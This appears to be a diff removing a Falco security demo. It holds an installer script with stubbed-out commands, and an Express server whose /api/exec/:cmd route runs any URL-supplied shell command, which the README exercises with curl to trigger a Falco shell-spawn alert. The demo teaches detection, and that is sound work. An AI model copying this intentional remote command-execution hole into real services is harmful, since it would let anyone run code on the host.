# A yum -q -y install my-software command would normally be here
echo "*** my-software Installed!"
}
function install_deb {
export DEBIAN_FRONTEND=noninteractive
if ! hash curl > /dev/null 2>&1; then
echo "* Installing curl"
apt-get -qq -y install curl < /dev/null
fi
echo "*** Installing my-software public key"
# A curl <url> | apt-key add - command would normally be here
echo "*** Installing my-software repository"
# A curl path-to.list <some url> would normally be here
echo "*** Installing my-software"
# An apt-get -qq -y install my-software command would normally be here
echo "*** my-software Installed!"
}
function unsupported {
echo 'Unsupported operating system. Please consider writing to the mailing list at'
echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
echo 'installation.'
exit 1
}
if [ $(id -u) != 0 ]; then
echo "Installer must be run as root (or with sudo)."
# exit 1
fi
echo "* Detecting operating system"
ARCH=$(uname -m)
if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
unsupported
fi
if [ -f /etc/debian_version ]; then
if [ -f /etc/lsb-release ]; then
. /etc/lsb-release
DISTRO=$DISTRIB_ID
VERSION=${DISTRIB_RELEASE%%.*}
else
DISTRO="Debian"
VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
fi
case "$DISTRO" in
"Ubuntu")
if [ $VERSION -ge 10 ]; then
install_deb
else
unsupported
fi
;;
"LinuxMint")
if [ $VERSION -ge 9 ]; then
install_deb
else
unsupported
fi
;;
"Debian")
if [ $VERSION -ge 6 ]; then
install_deb
elif [[ $VERSION == *sid* ]]; then
install_deb
else
unsupported
fi
;;
*)
unsupported
;;
esac
elif [ -f /etc/system-release-cpe ]; then
DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
case "$DISTRO" in
"oracle" | "centos" | "redhat")
if [ $VERSION -ge 6 ]; then
install_rpm
else
unsupported
fi
;;
"amazon")
install_rpm
;;
"fedoraproject")
if [ $VERSION -ge 13 ]; then
install_rpm
else
unsupported
fi
;;
*)
unsupported
;;
esac
else
unsupported
fi

View File

@ -1,66 +0,0 @@
# Demo of falco with bash exec via poorly designed REST API.
## Introduction
This example shows how a server could have a poorly designed API that
allowed a client to execute arbitrary programs on the server, and how
that behavior can be detected using Sysdig Falco.
`server.js` in this directory defines the server. The poorly designed
API is this route handler:
```javascript
router.get('/exec/:cmd', function(req, res) {
var output = child_process.execSync(req.params.cmd);
res.send(output);
});
app.use('/api', router);
```
It blindly takes the url portion after `/api/exec/<cmd>` and tries to
execute it. A horrible design choice(!), but allows us to easily show
Sysdig falco's capabilities.
## Demo architecture
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
* falco: will detect when you execute a shell via the express server.
### Access urls under `/api/exec/<cmd>` to run arbitrary commands.
Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
```
$ curl http://localhost:8181/api/exec/ls
demo.yml
node_modules
package.json
README.md
server.js
```
```
$ curl http://localhost:8181/api/exec/pwd
.../examples/nodejs-bad-rest-api
```
### Try to run bash via `/api/exec/bash`, falco sends alert.
If you try to run bash via `/api/exec/bash`, falco will generate an alert:
```
falco | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
```

View File

@ -1,21 +0,0 @@
express_server:
container_name: express_server
image: node:latest
command: bash -c "apt-get -y update && apt-get -y install runit && cd /usr/src/app && npm install && runsv /usr/src/app"
ports:
- "8181:8181"
volumes:
- ${PWD}:/usr/src/app
falco:
container_name: falco
image: falcosecurity/falco:latest
privileged: true
volumes:
- /var/run/docker.sock:/host/var/run/docker.sock
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
tty: true

View File

@ -1,7 +0,0 @@
{
"name": "bad-rest-api",
"main": "server.js",
"dependencies": {
"express": "~4.16.0"
}
}

View File

@ -1,2 +0,0 @@
#!/bin/sh
node server.js

View File

@ -1,25 +0,0 @@
var express = require('express'); // call express
var app = express(); // define our app using express
var child_process = require('child_process');
var port = process.env.PORT || 8181; // set our port
// ROUTES FOR OUR API
// =============================================================================
var router = express.Router(); // get an instance of the express Router
// test route to make sure everything is working (accessed at GET http://localhost:8181/api)
router.get('/', function(req, res) {
res.json({ message: 'API available'});
});
router.get('/exec/:cmd', function(req, res) {
var ret = child_process.spawnSync(req.params.cmd, { shell: true});
res.send(ret.stdout);
});
app.use('/api', router);
app.listen(port);
console.log('Server running on port: ' + port);